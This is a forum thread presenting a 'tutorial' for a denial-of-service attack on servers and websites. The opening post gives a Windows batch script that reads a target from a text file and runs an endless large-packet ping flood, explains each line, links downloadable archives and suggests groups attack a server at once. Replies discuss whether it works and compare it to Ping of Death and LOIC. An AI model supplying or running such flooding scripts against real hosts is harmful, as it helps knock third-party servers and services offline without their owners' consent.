Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Programming Tutorials › [Batch] Making a Dos Attack (Servers and Websites)

Lightbulb[Batch] Making a Dos Attack (Servers and Websites)

Posts 1–5 of 5 · Page 1 of 1
StaticHS
StaticHS
[Batch] Making a Dos Attack (Servers and Websites)
Hello, today I'm going to be showing you how to make a simple Dos Attack.
Dos attacks are not very strong, but if you have a group that dos a server at the same time, you could easily crash it.
Code:
@echo off
echo -------------------------------------------------
echo !     This has been made by StaticHS @Mpgh.net!
echo -------------------------------------------------
set /p ping= <ping.txt
ping %ping% -t -l 65500
Code:
echo -------------------------------------------------
echo !     This has been made by StaticHS @Mpgh.net!
echo -------------------------------------------------
This shows who made it (if you release it).

Code:
set /p ping= <ping.txt
Makes the ping able to be edited through a .txt file.

Code:
ping %ping% -t -l 65500
Sends a lot of packets to the server in order to crash it.

Virus Scans:
https://www.virustotal.com/file/2c6e...is/1344153696/
Dos tut.rar - Jotti's malware scan
Dos tut_mpgh.net.rar
#1 · 14y ago
SomeAsianDudeNetwork
SomeAsianDudeNetwork
Isn't it DDoS? I don't know where I could test this and prove that it works :P.

-Edit
I downloaded it and I tried to run it and it didn't even run :P. I don't know how to remove my "Thank You"
#2 · edited 14y ago · 14y ago
StaticHS
StaticHS
Quote Originally Posted by SomeAsianDudeNetwork View Post
Isn't it DDoS? I don't know where I could test this and prove that it works :P.

-Edit
I downloaded it and I tried to run it and it didn't even run :P. I don't know how to remove my "Thank You"
I forgot to add something.
You need to extract both files to the same directory.

---------- Post added at 06:17 PM ---------- Previous post was at 06:16 PM ----------

You can't ddos with a batch file.
Unless you have many computers attacking the same server at once.
#3 · 14y ago
TR
TrollerCoaster
This alone will work in dial-up connections fairly well. Anyone know some dial-up servers? Didn't think so.
This is also called Ping of Death, and on 64-bit machines it is possible to send more bytes at once in your ping packets.

You also need an army of computers to successfully ping of death any vulnerable servers anyway.
#4 · 14y ago
BL
BluntGod_
Quote Originally Posted by TrollerCoaster View Post
This alone will work in dial-up connections fairly well. Anyone know some dial-up servers? Didn't think so.
This is also called Ping of Death, and on 64-bit machines it is possible to send more bytes at once in your ping packets.

You also need an army of computers to successfully ping of death any vulnerable servers anyway.
True. LOIC modification programs nowadays use the ping of death for attacks. Which is why most fail.
#5 · 14y ago
Posts 1–5 of 5 · Page 1 of 1

Post a Reply

Similar Threads

  • 19/10/10 6h00 gtm+1 Server and website downBy furox94 in Call of Duty Modern Warfare 2 Private Servers
    2Last post 15y ago
  • How to make a minecraft multiplayer server [Hamachi and/or Lan network]By hello123321 in Minecraft Tutorials
    2Last post 15y ago
  • request a dos attackBy maze in General Hacking
    2Last post 18y ago
  • DoS attack?By cool_guy in General Game Hacking
    16Last post 18y ago
  • Any way to make my computer go fast and faterBy Gourav2122 in Hardware & Software Support
    18Last post 19y ago

Tags for this Thread

#denial of service#dos#hack#minecraft#server#tut#tutorial